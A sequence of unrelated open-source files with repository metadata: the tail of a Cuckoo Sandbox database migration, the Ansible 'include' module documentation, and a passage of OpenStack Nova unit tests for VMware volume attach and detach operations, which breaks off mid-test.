sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), server_default=sa.func.now(), nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
elif conn.engine.driver == "pysqlite":
# Edit task status enumeration in Task.
# NOTE: To workaround limitations in SQLite we have to create a temporary table, create the new schema and copy data.
# Read data.
tasks_data = []
old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
for item in old_tasks:
d = {}
d["id"] = item[0]
d["target"] = item[1]
d["category"] = item[2]
d["timeout"] = item[3]
d["priority"] = item[4]
d["custom"] = item[5]
d["machine"] = item[6]
d["package"] = item[7]
d["options"] = item[8]
d["platform"] = item[9]
d["memory"] = item[10]
d["enforce_timeout"] = item[11]
if isinstance(item[12], datetime):
d["added_on"] = item[12]
else:
d["added_on"] = parse(item[12])
if isinstance(item[13], datetime):
d["started_on"] = item[13]
else:
d["started_on"] = parse(item[13])
if isinstance(item[14], datetime):
d["completed_on"] = item[14]
else:
d["completed_on"] = parse(item[14])
d["status"] = item[15]
d["sample_id"] = item[16]
# Force clock.
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
d["clock"] = d["added_on"]
# Enum migration, "success" isn"t a valid state now.
if d["status"] == "success":
d["status"] = "completed"
tasks_data.append(d)
# Rename original table.
op.rename_table("tasks", "old_tasks")
# Drop old table.
op.drop_table("old_tasks")
# Drop old Enum.
sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
# Create new table with 1.0 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), server_default=sa.func.now(), nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
# Migrate mongo.
mongo_upgrade()
def mongo_upgrade():
"""Migrate mongodb schema and data."""
# Read reporting.conf to fetch mongo configuration.
config = Config(cfg=os.path.join("..", "..", "conf", "reporting.conf"))
# Run migration only if mongo is enabled as reporting module.
if config.mongodb.enabled:
host = config.mongodb.get("host", "127.0.0.1")
port = config.mongodb.get("port", 27017)
print "Mongo reporting is enabled, strarting mongo data migration."
# Connect.
try:
conn = Connection(host, port)
db = conn.cuckoo
except TypeError:
print "Mongo connection port must be integer"
sys.exit()
except ConnectionFailure:
print "Cannot connect to MongoDB"
sys.exit()
# Check for schema version and create it.
if "cuckoo_schema" in db.collection_names():
print "Mongo schema version not expected"
sys.exit()
else:
db.cuckoo_schema.save({"version": mongo_revision})
else:
print "Mongo reporting module not enabled, skipping mongo migration."
def downgrade():
# We don"t support downgrade.
pass
| gpl-3.0 |
brokenjacobs/ansible | lib/ansible/modules/utilities/logic/include.py | 50 | 2305 | #!/usr/bin/python
# -*- mode: python -*-
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
author:
- "Ansible Core Team (@ansible)"
module: include
short_description: include a play or task list.
description:
- Includes a file with a list of plays or tasks to be executed in the current playbook.
- Files with a list of plays can only be included at the top level, lists of tasks can only be included where tasks normally run (in play).
- Before 2.0 all includes were 'static', executed at play compile time.
- Static includes are not subject to most directives, for example, loops or conditionals, they are applied instead to each inherited task.
- Since 2.0 task includes are dynamic and behave more like real tasks. This means they can be looped, skipped and use variables from any source.
Ansible tries to auto detect this, use the `static` directive (new in 2.1) to bypass autodetection.
version_added: "0.6"
options:
free-form:
description:
- This module allows you to specify the name of the file directly w/o any other options.
notes:
- This is really not a module, though it appears as such, this is a feature of the Ansible Engine, as such it cannot be overridden the same way a
module can.
'''
EXAMPLES = """
# include a play after another play
- hosts: localhost
tasks:
- debug:
msg: "play1"
- include: otherplays.yml
# include task list in play
- hosts: all
tasks:
- debug:
msg: task1
- include: stuff.yml
- debug:
msg: task10
# dyanmic include task list in play
- hosts: all
tasks:
- debug:
msg: task1
- include: "{{ hostvar }}.yml"
static: no
when: hostvar is defined
"""
RETURN = """
# this module does not return anything except plays or tasks to execute
"""
| gpl-3.0 |
gooddata/openstack-nova | nova/tests/unit/virt/vmwareapi/test_volumeops.py | 2 | 33206 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils.fixture import uuidsentinel
from oslo_vmware import exceptions as oslo_vmw_exceptions
from oslo_vmware import vim_util as vutil
from nova.compute import power_state
from nova.compute import vm_states
from nova import context
from nova import exception
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.image import fake as image_fake
from nova.tests.unit.virt.vmwareapi import fake as vmwareapi_fake
from nova.tests.unit.virt.vmwareapi import stubs
from nova.virt.vmwareapi import constants
from nova.virt.vmwareapi import driver
from nova.virt.vmwareapi import vm_util
from nova.virt.vmwareapi import volumeops
class VMwareVolumeOpsTestCase(test.NoDBTestCase):
def setUp(self):
super(VMwareVolumeOpsTestCase, self).setUp()
vmwareapi_fake.reset()
stubs.set_stubs(self)
self._session = driver.VMwareAPISession()
self._context = context.RequestContext('fake_user', 'fake_project')
self._volumeops = volumeops.VMwareVolumeOps(self._session)
self._image_id = image_fake.get_valid_image_id()
self._instance_values = {
'name': 'fake_name',
'uuid': uuidsentinel.foo,
'vcpus': 1,
'memory_mb': 512,
'image_ref': self._image_id,
'root_gb': 10,
'node': 'respool-1001(MyResPoolName)',
'expected_attrs': ['system_metadata'],
}
self._instance = fake_instance.fake_instance_obj(self._context,
**self._instance_values)
def _test_detach_disk_from_vm(self, destroy_disk=False):
def fake_call_method(module, method, *args, **kwargs):
vmdk_detach_config_spec = kwargs.get('spec')
virtual_device_config = vmdk_detach_config_spec.deviceChange[0]
self.assertEqual('remove', virtual_device_config.operation)
self.assertEqual('ns0:VirtualDeviceConfigSpec',
virtual_device_config.obj_name)
if destroy_disk:
self.assertEqual('destroy',
virtual_device_config.fileOperation)
else:
self.assertFalse(hasattr(virtual_device_config,
'fileOperation'))
return 'fake_configure_task'
with test.nested(
mock.patch.object(self._session, '_wait_for_task'),
mock.patch.object(self._session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
fake_device = vmwareapi_fake.DataObject()
fake_device.backing = vmwareapi_fake.DataObject()
fake_device.backing.fileName = 'fake_path'
fake_device.key = 'fake_key'
self._volumeops.detach_disk_from_vm('fake_vm_ref', self._instance,
fake_device, destroy_disk)
_wait_for_task.assert_has_calls([
mock.call('fake_configure_task')])
def test_detach_with_destroy_disk_from_vm(self):
self._test_detach_disk_from_vm(destroy_disk=True)
def test_detach_without_destroy_disk_from_vm(self):
self._test_detach_disk_from_vm(destroy_disk=False)
def _fake_call_get_object_property(self, uuid, result):
def fake_call_method(vim, method, vm_ref, prop):
expected_prop = 'config.extraConfig["volume-%s"]' % uuid
self.assertEqual('VirtualMachine', vm_ref._type)
self.assertEqual(expected_prop, prop)
return result
return fake_call_method
def test_get_volume_uuid(self):
vm_ref = vmwareapi_fake.ManagedObjectReference('VirtualMachine',
'vm-134')
uuid = '1234'
opt_val = vmwareapi_fake.OptionValue('volume-%s' % uuid, 'volume-val')
fake_call = self._fake_call_get_object_property(uuid, opt_val)
with mock.patch.object(self._session, "_call_method", fake_call):
val = self._volumeops._get_volume_uuid(vm_ref, uuid)
self.assertEqual('volume-val', val)
def test_get_volume_uuid_not_found(self):
vm_ref = vmwareapi_fake.ManagedObjectReference('VirtualMachine',
'vm-134')
uuid = '1234'
fake_call = self._fake_call_get_object_property(uuid, None)
with mock.patch.object(self._session, "_call_method", fake_call):
val = self._volumeops._get_volume_uuid(vm_ref, uuid)
self.assertIsNone(val)
def test_attach_volume_vmdk_invalid(self):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
instance = mock.MagicMock(name='fake-name', vm_state=vm_states.ACTIVE)
vmdk_info = vm_util.VmdkInfo('fake-path', constants.ADAPTER_TYPE_IDE,
constants.DISK_TYPE_PREALLOCATED, 1024,
'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref'),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(vm_util, 'get_vm_state',
return_value=power_state.RUNNING)
) as (get_vm_ref, get_volume_ref, get_vmdk_info,
get_vm_state):
self.assertRaises(exception.Invalid,
self._volumeops._attach_volume_vmdk, connection_info,
instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
self.assertTrue(get_vmdk_info.called)
get_vm_state.assert_called_once_with(self._volumeops._session,
instance)
@mock.patch.object(vm_util, 'get_vm_extra_config_spec',
return_value=mock.sentinel.extra_config)
@mock.patch.object(vm_util, 'reconfigure_vm')
def test_update_volume_details(self, reconfigure_vm,
get_vm_extra_config_spec):
volume_uuid = '26f5948e-52a3-4ee6-8d48-0a379afd0828'
device_uuid = '0d86246a-2adb-470d-a9f7-bce09930c5d'
self._volumeops._update_volume_details(
mock.sentinel.vm_ref, volume_uuid, device_uuid)
get_vm_extra_config_spec.assert_called_once_with(
self._volumeops._session.vim.client.factory,
{'volume-%s' % volume_uuid: device_uuid})
reconfigure_vm.assert_called_once_with(self._volumeops._session,
mock.sentinel.vm_ref,
mock.sentinel.extra_config)
def _fake_connection_info(self):
return {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_volume_uuid')
@mock.patch.object(vm_util, 'get_vmdk_backed_disk_device')
def test_get_vmdk_backed_disk_device(self, get_vmdk_backed_disk_device,
get_volume_uuid):
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
disk_uuid = mock.sentinel.disk_uuid
get_volume_uuid.return_value = disk_uuid
device = mock.sentinel.device
get_vmdk_backed_disk_device.return_value = device
vm_ref = mock.sentinel.vm_ref
connection_info = self._fake_connection_info()
ret = self._volumeops._get_vmdk_backed_disk_device(
vm_ref, connection_info['data'])
self.assertEqual(device, ret)
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_volume_uuid.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'])
get_vmdk_backed_disk_device.assert_called_once_with(hardware_devices,
disk_uuid)
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_volume_uuid')
@mock.patch.object(vm_util, 'get_vmdk_backed_disk_device')
def test_get_vmdk_backed_disk_device_with_missing_disk_device(
self, get_vmdk_backed_disk_device, get_volume_uuid):
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
disk_uuid = mock.sentinel.disk_uuid
get_volume_uuid.return_value = disk_uuid
get_vmdk_backed_disk_device.return_value = None
vm_ref = mock.sentinel.vm_ref
connection_info = self._fake_connection_info()
self.assertRaises(exception.DiskNotFound,
self._volumeops._get_vmdk_backed_disk_device,
vm_ref, connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_volume_uuid.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'])
get_vmdk_backed_disk_device.assert_called_once_with(hardware_devices,
disk_uuid)
def test_detach_volume_vmdk(self):
vmdk_info = vm_util.VmdkInfo('fake-path', 'lsiLogic', 'thin',
1024, 'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref',
return_value=mock.sentinel.vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref',
return_value=mock.sentinel.volume_ref),
mock.patch.object(self._volumeops,
'_get_vmdk_backed_disk_device',
return_value=mock.sentinel.device),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(self._volumeops, '_consolidate_vmdk_volume'),
mock.patch.object(self._volumeops, 'detach_disk_from_vm'),
mock.patch.object(self._volumeops, '_update_volume_details'),
) as (get_vm_ref, get_volume_ref, get_vmdk_backed_disk_device,
get_vmdk_info, consolidate_vmdk_volume, detach_disk_from_vm,
update_volume_details):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id':
'd11a82de-ddaa-448d-b50a-a255a7e61a1e'
}}
instance = mock.MagicMock(name='fake-name',
vm_state=vm_states.ACTIVE)
self._volumeops._detach_volume_vmdk(connection_info, instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
get_vmdk_backed_disk_device.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data'])
get_vmdk_info.assert_called_once_with(self._volumeops._session,
mock.sentinel.volume_ref)
consolidate_vmdk_volume.assert_called_once_with(
instance, mock.sentinel.vm_ref, mock.sentinel.device,
mock.sentinel.volume_ref, adapter_type=vmdk_info.adapter_type,
disk_type=vmdk_info.disk_type)
detach_disk_from_vm.assert_called_once_with(mock.sentinel.vm_ref,
instance,
mock.sentinel.device)
update_volume_details.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data']['volume_id'], "")
def test_detach_volume_vmdk_invalid(self):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
instance = mock.MagicMock(name='fake-name', vm_state=vm_states.ACTIVE)
vmdk_info = vm_util.VmdkInfo('fake-path', constants.ADAPTER_TYPE_IDE,
constants.DISK_TYPE_PREALLOCATED, 1024,
'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref',
return_value=mock.sentinel.vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(self._volumeops,
'_get_vmdk_backed_disk_device'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(vm_util, 'get_vm_state',
return_value=power_state.RUNNING)
) as (get_vm_ref, get_volume_ref, get_vmdk_backed_disk_device,
get_vmdk_info, get_vm_state):
self.assertRaises(exception.Invalid,
self._volumeops._detach_volume_vmdk, connection_info,
instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
get_vmdk_backed_disk_device.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data'])
self.assertTrue(get_vmdk_info.called)
get_vm_state.assert_called_once_with(self._volumeops._session,
instance)
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(vm_util, 'get_rdm_disk')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
def test_detach_volume_iscsi(self, detach_disk_from_vm, iscsi_get_target,
get_rdm_disk, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
device_name = mock.sentinel.device_name
disk_uuid = mock.sentinel.disk_uuid
iscsi_get_target.return_value = (device_name, disk_uuid)
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
device = mock.sentinel.device
get_rdm_disk.return_value = device
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self._volumeops._detach_volume_iscsi(connection_info, instance)
get_vm_ref.assert_called_once_with(session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_rdm_disk.assert_called_once_with(hardware_devices, disk_uuid)
detach_disk_from_vm.assert_called_once_with(
vm_ref, instance, device, destroy_disk=True)
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
def test_detach_volume_iscsi_with_missing_iscsi_target(
self, iscsi_get_target, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
iscsi_get_target.return_value = (None, None)
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self.assertRaises(
exception.StorageError, self._volumeops._detach_volume_iscsi,
connection_info, instance)
get_vm_ref.assert_called_once_with(self._volumeops._session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(vm_util, 'get_rdm_disk')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
def test_detach_volume_iscsi_with_missing_disk_device(
self, detach_disk_from_vm, iscsi_get_target,
get_rdm_disk, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
device_name = mock.sentinel.device_name
disk_uuid = mock.sentinel.disk_uuid
iscsi_get_target.return_value = (device_name, disk_uuid)
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
get_rdm_disk.return_value = None
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self.assertRaises(
exception.DiskNotFound, self._volumeops._detach_volume_iscsi,
connection_info, instance)
get_vm_ref.assert_called_once_with(session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_rdm_disk.assert_called_once_with(hardware_devices, disk_uuid)
self.assertFalse(detach_disk_from_vm.called)
def _test_attach_volume_vmdk(self, adapter_type=None):
connection_info = {'driver_volume_type': constants.DISK_FORMAT_VMDK,
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
vm_ref = 'fake-vm-ref'
volume_device = mock.MagicMock()
volume_device.backing.fileName = 'fake-path'
default_adapter_type = constants.DEFAULT_ADAPTER_TYPE
disk_type = constants.DEFAULT_DISK_TYPE
disk_uuid = 'e97f357b-331e-4ad1-b726-89be048fb811'
backing = mock.Mock(uuid=disk_uuid)
device = mock.Mock(backing=backing)
vmdk_info = vm_util.VmdkInfo('fake-path', default_adapter_type,
disk_type, 1024,
device)
adapter_type = adapter_type or default_adapter_type
if adapter_type == constants.ADAPTER_TYPE_IDE:
vm_state = power_state.SHUTDOWN
else:
vm_state = power_state.RUNNING
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(self._volumeops, 'attach_disk_to_vm'),
mock.patch.object(self._volumeops, '_update_volume_details'),
mock.patch.object(vm_util, 'get_vm_state',
return_value=vm_state)
) as (get_vm_ref, get_volume_ref, get_vmdk_info, attach_disk_to_vm,
update_volume_details, get_vm_state):
self._volumeops.attach_volume(connection_info, self._instance,
adapter_type)
get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
self.assertTrue(get_vmdk_info.called)
attach_disk_to_vm.assert_called_once_with(
vm_ref, self._instance, adapter_type,
constants.DISK_TYPE_PREALLOCATED, vmdk_path='fake-path')
update_volume_details.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'], disk_uuid)
if adapter_type == constants.ADAPTER_TYPE_IDE:
get_vm_state.assert_called_once_with(self._volumeops._session,
self._instance)
else:
self.assertFalse(get_vm_state.called)
def _test_attach_volume_iscsi(self, adapter_type=None):
connection_info = {'driver_volume_type': constants.DISK_FORMAT_ISCSI,
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
vm_ref = 'fake-vm-ref'
default_adapter_type = constants.DEFAULT_ADAPTER_TYPE
adapter_type = adapter_type or default_adapter_type
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
mock.patch.object(self._volumeops, '_iscsi_discover_target',
return_value=(mock.sentinel.device_name,
mock.sentinel.uuid)),
mock.patch.object(vm_util, 'get_scsi_adapter_type',
return_value=adapter_type),
mock.patch.object(self._volumeops, 'attach_disk_to_vm')
) as (get_vm_ref, iscsi_discover_target, get_scsi_adapter_type,
attach_disk_to_vm):
self._volumeops.attach_volume(connection_info, self._instance,
adapter_type)
get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
iscsi_discover_target.assert_called_once_with(
connection_info['data'])
if adapter_type is None:
self.assertTrue(get_scsi_adapter_type.called)
attach_disk_to_vm.assert_called_once_with(vm_ref,
self._instance, adapter_type, 'rdmp',
device_name=mock.sentinel.device_name)
def test_attach_volume_vmdk(self):
for adapter_type in (None, constants.DEFAULT_ADAPTER_TYPE,
constants.ADAPTER_TYPE_BUSLOGIC,
constants.ADAPTER_TYPE_IDE,
constants.ADAPTER_TYPE_LSILOGICSAS,
constants.ADAPTER_TYPE_PARAVIRTUAL):
self._test_attach_volume_vmdk(adapter_type)
def test_attach_volume_iscsi(self):
for adapter_type in (None, constants.DEFAULT_ADAPTER_TYPE,
constants.ADAPTER_TYPE_BUSLOGIC,
constants.ADAPTER_TYPE_LSILOGICSAS,
constants.ADAPTER_TYPE_PARAVIRTUAL):
self._test_attach_volume_iscsi(adapter_type)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
def test_consolidate_vmdk_volume_with_no_relocate(
self, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
device = mock.Mock(backing=backing)
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
self._volumeops._consolidate_vmdk_volume(self._instance, vm_ref,
device, volume_ref)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
self.assertFalse(relocate_vm.called)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_host_of_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_res_pool_of_host')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, 'attach_disk_to_vm')
def test_consolidate_vmdk_volume_with_relocate(
self, attach_disk_to_vm, detach_disk_from_vm, get_res_pool_of_host,
get_host_of_vm, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
new_file_name = mock.sentinel.new_file_name
datastore = mock.sentinel.datastore
new_backing = mock.Mock(fileName=new_file_name, datastore=datastore)
device = mock.Mock(backing=new_backing)
host = mock.sentinel.host
get_host_of_vm.return_value = host
rp = mock.sentinel.rp
get_res_pool_of_host.return_value = rp
detach_disk_from_vm.side_effect = [
oslo_vmw_exceptions.FileNotFoundException]
instance = self._instance
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
adapter_type = constants.ADAPTER_TYPE_BUSLOGIC
disk_type = constants.DISK_TYPE_EAGER_ZEROED_THICK
self._volumeops._consolidate_vmdk_volume(instance, vm_ref, device,
volume_ref, adapter_type,
disk_type)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
relocate_vm.assert_called_once_with(self._session,
volume_ref, rp, datastore, host)
detach_disk_from_vm.assert_called_once_with(
volume_ref, instance, original_device, destroy_disk=True)
attach_disk_to_vm.assert_called_once_with(
volume_ref, instance, adapter_type, disk_type,
vmdk_path=new_file_name)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_host_of_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_res_pool_of_host')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, 'attach_disk_to_vm')
def test_consolidate_vmdk_volume_with_missing_vmdk(
self, attach_disk_to_vm, detach_disk_from_vm, get_res_pool_of_host,
get_host_of_vm, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
new_file_name = mock.sentinel.new_file_name
datastore = mock.sentinel.datastore
new_backing = mock.Mock(fileName=new_file_name, datastore=datastore)
device = mock.Mock(backing=new_backing)
host = mock.sentinel.host
get_host_of_vm.return_value = host
rp = mock.sentinel.rp
get_res_pool_of_host.return_value = rp
relocate_vm.side_effect = [
oslo_vmw_exceptions.FileNotFoundException, None]
instance = mock.sentinel.instance
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
adapter_type = constants.ADAPTER_TYPE_BUSLOGIC
disk_type = constants.DISK_TYPE_EAGER_ZEROED_THICK
self._volumeops._consolidate_vmdk_volume(instance, vm_ref, device,
volume_ref, adapter_type,
disk_type)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
relocate_calls = [mock.call(self._session, volume_ref, rp, datastore,
host),
mock.call(self._session, volume_ref, rp, datastore,
host)]
self.assertEqual(relocate_calls, relocate_vm.call_args_list)
detach_disk_from_vm.assert_called_once_with(
volume_ref, instance, original_device)
attach_disk_to_vm.assert_called_once_with(
volume_ref, instance, adapter_type, disk_type,
vmdk_path=new_file_name)
def test_iscsi_get_host_iqn(self):
host_mor = mock.Mock()
iqn = 'iscsi-name'
hba = vmwareapi_fake.HostInternetScsiHba(iqn)
hbas = mock.MagicMock(HostHostBusAdapter=[hba])
with test.nested(
mock.patch.object(vm_util, 'get_host_ref_for_vm',
return_value=host_mor),
mock.patch.object(self._volumeops._session, '_call_method',
return_value=hbas)
) as (fake_get_host_ref_for_vm, fake_call_method):
result = self._volumeops._iscsi_get_host_iqn(self._instance)
fake_get_host_ref_for_vm.assert_called_once_with(
self._volumeops._session, self._instance)
fake_call_method.assert_called_once_with(vutil,
"get_object_property",
host_mor,
"config.storageDevice.hostBusAdapter")
self.assertEqual(iqn, result)
def test_iscsi_get_host_iqn_instance_not_found(self):
host_mor = mock.Mock()
iqn = 'iscsi-name'
hba = vmwareapi_fake.HostInternetScsiHba(iqn)
hbas = mock.MagicMock(HostHostBusAdapter=[hba])
with test.nested(
mock.patch.object(vm_util, 'get_host_ref_for_vm',
side_effect=exception.InstanceNotFound('fake')),
mock.patch.object(vm_util, 'get_host_ref',
return_value=host_mor),
mock.patch.object(self._volumeops._session, '_call_method',
return_value=hbas)
) as (fake_get_host_ref_for_vm,
fake_get_host_ref,
fake_call_method):
result = self._volumeops._iscsi_get_host_iqn(self._instance)
fake_get_host_ref_for_vm.assert_called_once_with(
self._volumeops._session, self._instance)
fake_get_host_ref.assert_called_once_with(
self._volumeops._session, self._volumeops._cluster)
fake_call_method.assert_called_once_with(vutil,
"get_object_property",
host_mor,
"config.storageDevice.hostBusAdapter")
self.assertEqual(iqn, result)
def test_get_volume_connector(self):
vm_id = 'fake-vm'
vm_ref = mock.MagicMock(value=vm_id)
iqn = 'iscsi-name'
host_ip = 'testhostname'
self.flags(host_ip=host_ip, group='vmware')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
